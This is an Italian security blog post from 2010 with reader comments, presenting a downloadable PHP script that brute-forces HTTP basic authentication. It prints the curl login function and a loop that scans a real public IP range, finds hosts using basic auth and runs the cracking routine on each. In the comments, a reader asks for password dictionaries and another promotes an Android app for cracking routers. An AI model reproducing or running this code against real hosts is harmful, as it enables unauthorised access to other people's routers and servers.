ClsHack:Computer Security Blog    

[PHP]BruteForce Http basic authentication

Posted on: 25 August 2010

Subito avevo scritto questo scanner in python, poi non riuscivo a gestire bene l’eccezzione httplib.badstatus e quindi ho converti lo scanner in php :D è è è esercizio :D

La configurazione dello scanner è ababstanza semplice, per l’autentificazione, ho usato i la libreria curl di php ;)

La funzione per fare un login in , con i curl è:

function authentication($ip,$user,$password)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL,$ip);
	curl_setopt($ch, CURLOPT_HEADER, 1);
	curl_setopt($ch, CURLOPT_NOBODY, 1);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
	curl_setopt($ch,CURLOPT_USERPWD, "$user:$password");
	curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
	curl_exec($ch);
	$info =curl_getinfo($ch);
	curl_close ($ch);
	if($info["http_code"]=="200")
        {
		return 1;
        }
	else
        {
		return 0;
         }
}

Codice abbastanza semplice :D

Ci sono molti modi per usare questo mio mini script :D ad esempio su multipli ip o.O attivi =>

for($i=26;$i<=255;$i++)
{
	for($k=1;$k<=255;$k++)
	{
		$ip="79.24.$i.$k";
		if(unreadable($ip))
		{
			if(http_basic($ip))
			{
				echo "$ip\n";
				crack($ip);
			}
		}
	}
}

Ma lasciamo perdere queste lamerate :D

Bene spero vi sia utile -.-' :D

DOWNLOAD PHP-Http basic authentication-BRUTEFORCE

Ciao :D

Related posts:

  1. MEDUSA:Password(http/ftp/mysql…etc) Cracker for GNU/Linux
  2. RIPS:source code analyser for vulnerabilities in PHP
  3. [beta1]ClsHack Scanner: PHP _GET/_POST/_COOKIE VAR LOCATE
  4. [php/mysql] semplice script login con sessioni
  5. HTTP session hijacking with Ettercap and Hamster

This entry was posted on Wednesday, August 25th, 2010 at 4:44 pm and is filed under GNU/Linux, Programming, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:

  • Pingback: news sul mondo della programmazione » [PHP]BruteForce Http basic authentication

  • Pingback: [PHP]BruteForce Http basic authentication

  • Pingback: [PHP]BruteForce Http basic authentication | ItaliaON

  • falso_nome

    - “l’eccezzione”
    - “ho converti”
    - “ababstanza”
    - “l’autentificazione”

    Quattro errori in due sole righe… ma ti impegni o ti vengono cosi`? ;)

  • clshack

    @falso_nome:

    Panico, è perchè scrivo veloce, e non avevo il dizionario su firefox :D ora l’ho installato :D

    L’importante è che si capisca o.O :D

  • Devilinux

    devilinux@lab:~/Scrivania/lab$ php router_brute.php
    PHP Fatal error: Call to undefined function curl_init() in /home/devilinux/Scrivania/lab/router_brute.php on line 39

  • clshack

    @devilinux:

    sudo apt-get install php5-curl && sudo service apache2 restart

    o.O

  • Pingback: [Remote-Router]Fake DNS and Phishing/Exploiting attack | Clshack

  • mattia9305

    Mi piaaaaaaaaaaaaaaaaaaaaaaaace.
    Non è che potresti postare i tuoi dizionari di user e password?

  • mattia9305

    P.s. Scusa il doppio commento..ho sia php5-curl che php5-cli,e ho installato php5-curl,ma lanciando lo script (php script.php),torna sempre al comando iniziale,non mi da l attesa dell input..Ndo sbaglio?

  • clshack

    @mattia9305:
    Lo script è semplicissimo… basta sapere un po’ di php per saperlo usare…

    Non si usano i programmi a caso solo per trovare password, e questo non è lo scopo del programma.

  • mattia9305

    Infatti la penso esattamente come te,se prima non sai cosa c’è dietro,non ne vedo il senso..Comunque era un errore di salvataggio file

  • clshack

    @mattia9305:

    Allora perfetto ;)

  • http://developtolearn.blogspot.com Antonio Vázquez Blanco

    Test my bruteforcing app for Android with included dictionaries. It was prepared for cracking routers especially. https://market.android.com/details?id=com.firebird.basicauthbruteforcer

  • Pingback: [Android]Http Basic Brute Force